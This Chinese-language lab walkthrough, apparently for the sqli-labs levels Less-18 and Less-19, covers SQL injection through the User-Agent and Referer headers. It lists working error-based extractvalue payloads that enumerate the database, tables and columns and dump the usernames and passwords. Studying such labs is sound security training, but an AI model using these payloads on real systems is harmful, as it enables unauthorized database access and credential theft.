Header
请求头注入,User-Agent、Referer、Cookie、......,注入点不同,注入手法相似
Less-18
User-Agent:通常就是用户的浏览器相关信息。例如:User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
'$uname' 和 '$passwd' 都进行了过滤
需要正确的账号密码才能执行到insert
闭合字符:' or 1 or ' 或 ' and 1 and '
uname=admin&passwd=admin&submit=Submit
#这里主要是判断账号能否登入
#Header注入也可以用 Burp Suite
判断闭合字符:
测试:User-Agent: '
源代码,'$uagent',在 '$IP' 和 'uname' 的前面,就不能把他们注释掉,不然根本 insert 不进
User-Agent: ' or 1 or '
#在数据库里就是这样的(''or 1 or '','$ip','$uname')
#达到了闭合的效果,进行下一步
查询当前数据库:
User-Agent:' or extractvalue(1,concat(0x7e,database())) or '
查询当前数据库的表:
User-Agent: ' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) or '
查询当前表的字段:
User-Agent: ' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) or '
查询数据:
User-Agent: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) or '
User-Agent: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) or '
...
Less-19
Referer:指当前请求的URL是在什么地址引用的。例如在www.a.com/index.html页面中点击一个指向www.b.com的超链接,那么,这个www.b.com的请求中的Referer就是www.a.com/index.html。通常我们见到的图片防盗链就是用这个实现的
'$uname' 和 '$passwd' 进行了过滤
需要正确的账号密码登录,才能执行insert
闭合字符:' or 1 or ' 或 ' and 1 and '
判断闭合字符:
Referer: '
Referer: ' or 1 or '
#在数据库里就是这样的(''or 1 or '','$ip')
查询当前数据库:
Referer: ' or extractvalue(1,concat(0x7e,database())) or '
查询当前数据库的表:
Referer: ' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) or '
查询当前表的字段:
Referer: ' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) or '
查询数据:
Referer: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) or '
Referer: ' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) or '
...